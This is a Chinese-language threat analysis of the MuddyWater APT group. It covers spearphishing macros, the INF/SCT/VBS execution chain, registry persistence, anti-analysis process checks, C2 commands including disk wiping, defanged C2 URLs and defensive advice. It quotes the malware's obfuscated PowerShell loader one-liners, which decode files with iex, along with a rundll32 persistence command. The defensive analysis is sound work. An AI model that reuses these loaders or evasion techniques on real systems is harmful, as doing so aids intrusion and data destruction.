MuddyWater最新攻击活动分析
字数 1848 2025-08-19 12:40:43

MuddyWater APT组织攻击活动技术分析文档

一、组织概述

MuddyWater是一个自2017年出现的APT组织,主要攻击目标包括:

  • 主要目标国家:伊朗、沙特阿拉伯
  • 次要目标国家:约旦、土耳其、阿塞拜疆、巴基斯坦、阿富汗
  • 其他受影响地区:马里、奥地利、俄罗斯、巴林等

攻击目标类型:

  • 政府组织
  • 军事实体
  • 电信公司
  • 教育机构

二、攻击技术细节

1. 初始感染向量

攻击方式:鱼叉式钓鱼攻击

  • 使用启用宏的Office 97-2003文档
  • 宏通常密码保护以防止静态分析
  • 触发方式:
    • 首次启用宏时执行
    • 部分样本通过激活伪造文本框触发

2. 宏Payload分析

宏执行流程:

  1. Base64编码的payload执行以下操作:
    • 释放2-3个文件到ProgramData文件夹
    • 添加当前用户的RUN注册表项实现持久化

典型释放文件:

  • \EventManager.dll
  • \EventManager.logs
  • \WindowsDefenderService.inil

注册表持久化示例:

Name: WindowsDefenderUpdater
Type: REG_EXPAND_SZ
Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1

3. 执行流分析

Case 1: INF/SCT/文本文件组合

  1. INF文件通过advpack.dll的LaunchINFSection函数启动
  2. INF通过scrobj.dll注册SCT文件
  3. SCT文件中的JS/VB代码通过WMI启用PowerShell one-liner

典型PowerShell命令:

powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));

Case 2: VBS/文本文件组合

  1. VBS文件自解码后调用mshta.exe
  2. 传递VB脚本代码给PowerShell one-liner

典型PowerShell命令:

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

4. PowerShell代码功能

主要行为:

  1. 关闭Office安全设置:

    • 禁用宏警告(Macro Warnings)
    • 禁用受保护视图(Protected View)

  2. 反分析检测:

    • 检查并匹配以下分析工具进程: 
      "win32_remote","win64_remote64","ollydbg","ProcessHacker","tcpview","autoruns","autorunsc","filemon","procmon","regmon","procexp","idaq","idaq64","ImmunityDebugger","Wireshark","dumpcap","HookExplorer","ImportREC","PETools","LordPE","dumpcap","SysInspector","proc_analyzer","sysAnalyzer","sniff_hit","windbg","joeboxcontrol","joeboxserver"
    • 检测到分析工具时触发重启或蓝屏(通过ntdll.dll NtRaiseHardError)

5. C2通信机制

  1. C2服务器选择:

    • 从硬编码URL列表中随机选择
    • 失败后尝试其他URL并休眠1-30秒

  2. 受害者注册:

    • 通过https://api.ipify.org/获取公网IP
    • 加密发送以下信息:
      • 公网IP
      • OS版本
      • 内网IP
      • 机器名
      • 域名
      • 用户名
    • 接收分配的$sysid用于后续通信

6. 支持的命令

命令 功能
upload 从C2下载文件保存到ProgramData
screenshot 截屏保存为PNG文件
Excel 接收PS代码通过Excel DDE执行
Outlook 接收PS代码通过Outlook COM执行
Risk 接收PS代码通过Explorer.exe执行
Reboot 立即重启系统
Shutdown 立即关闭系统
Clean 破坏C/D/E/F盘后重启

三、攻击者特征分析

  1. 文档元数据线索:

    • C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

  2. 语言特征:

    • 样本中发现中文提示: 
      无法连接到网址,请等待龙...无法访问本地计算机寄存器任务计划程序访问被拒绝

  3. 真实C2服务器(可能):

    • http://www.cankayasrc[.]com/style/js/main.php
    • http://ektamservis[.]com/includes/main.php
    • http://gtme[.]ae/font-awesome/css/main.php

四、防御建议

  1. 针对初始感染:

    • 禁用Office宏执行
    • 启用受保护视图
    • 教育用户识别钓鱼邮件

  2. 检测指标:

    • 监控ProgramData目录异常文件创建
    • 检测RUN注册表项异常修改
    • 监控异常PowerShell命令执行

  3. 高级防御:

    • 部署行为分析检测反分析行为
    • 阻断已知C2域名/IP
    • 监控对api.ipify.org的异常访问

  4. 应急响应:

    • 发现感染后立即隔离系统
    • 检查所有磁盘破坏情况
    • 重置所有凭据
MuddyWater APT组织攻击活动技术分析文档 一、组织概述 MuddyWater是一个自2017年出现的APT组织,主要攻击目标包括: 主要目标国家:伊朗、沙特阿拉伯 次要目标国家:约旦、土耳其、阿塞拜疆、巴基斯坦、阿富汗 其他受影响地区:马里、奥地利、俄罗斯、巴林等 攻击目标类型: 政府组织 军事实体 电信公司 教育机构 二、攻击技术细节 1. 初始感染向量 攻击方式:鱼叉式钓鱼攻击 使用启用宏的Office 97-2003文档 宏通常密码保护以防止静态分析 触发方式: 首次启用宏时执行 部分样本通过激活伪造文本框触发 2. 宏Payload分析 宏执行流程: Base64编码的payload执行以下操作: 释放2-3个文件到ProgramData文件夹 添加当前用户的RUN注册表项实现持久化 典型释放文件: \EventManager.dll \EventManager.logs \WindowsDefenderService.inil 注册表持久化示例: 3. 执行流分析 Case 1: INF/SCT/文本文件组合 INF文件通过advpack.dll的LaunchINFSection函数启动 INF通过scrobj.dll注册SCT文件 SCT文件中的JS/VB代码通过WMI启用PowerShell one-liner 典型PowerShell命令: Case 2: VBS/文本文件组合 VBS文件自解码后调用mshta.exe 传递VB脚本代码给PowerShell one-liner 典型PowerShell命令: 4. PowerShell代码功能 主要行为: 关闭Office安全设置: 禁用宏警告(Macro Warnings) 禁用受保护视图(Protected View) 反分析检测: 检查并匹配以下分析工具进程: 检测到分析工具时触发重启或蓝屏(通过ntdll.dll NtRaiseHardError) 5. C2通信机制 C2服务器选择: 从硬编码URL列表中随机选择 失败后尝试其他URL并休眠1-30秒 受害者注册: 通过https://api.ipify.org/获取公网IP 加密发送以下信息: 公网IP OS版本 内网IP 机器名 域名 用户名 接收分配的$sysid用于后续通信 6. 支持的命令 | 命令 | 功能 | |------|------| | upload | 从C2下载文件保存到ProgramData | | screenshot | 截屏保存为PNG文件 | | Excel | 接收PS代码通过Excel DDE执行 | | Outlook | 接收PS代码通过Outlook COM执行 | | Risk | 接收PS代码通过Explorer.exe执行 | | Reboot | 立即重启系统 | | Shutdown | 立即关闭系统 | | Clean | 破坏C/D/E/F盘后重启 | 三、攻击者特征分析 文档元数据线索: C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd 语言特征: 样本中发现中文提示: 真实C2服务器(可能): http://www.cankayasrc[ . ]com/style/js/main.php http://ektamservis[ . ]com/includes/main.php http://gtme[ . ]ae/font-awesome/css/main.php 四、防御建议 针对初始感染: 禁用Office宏执行 启用受保护视图 教育用户识别钓鱼邮件 检测指标: 监控ProgramData目录异常文件创建 检测RUN注册表项异常修改 监控异常PowerShell命令执行 高级防御: 部署行为分析检测反分析行为 阻断已知C2域名/IP 监控对api.ipify.org的异常访问 应急响应: 发现感染后立即隔离系统 检查所有磁盘破坏情况 重置所有凭据